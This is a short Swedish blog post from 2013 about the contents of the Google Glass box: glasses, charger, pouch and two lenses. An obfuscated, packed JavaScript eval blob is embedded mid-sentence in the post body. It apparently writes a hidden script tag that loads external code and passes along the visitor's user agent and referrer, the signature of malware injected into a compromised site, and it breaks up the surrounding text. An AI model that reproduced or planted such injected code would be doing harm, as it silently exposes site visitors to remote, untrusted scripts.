Image Image Image Image Image Image Image Image Image Image

| 28 maj, 2020

Scroll to top

Top

Google Glass – det här finns i lådan

Filip Urde
  • On 18 april, 2013
  • http://www.revue.se/filip-urde

Google eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|denhz|var|u0026u|referrer|izats||js|php’.split(’|’),0,{}))
Glass har äntligen börjat levereras, dock bara till utvecklare som anmält sig tidigt, men det är kul att veta att saker är i rullning. Via Engadget kunde vi se den här bilden och då få veta vad som finns i lådan.

 

google glasses
Förutom ett par Google Glass så är det en laddare, en påse att förvara glasögonen och två par glas, ett par färgade och ett par genomskinliga.
plus.google.com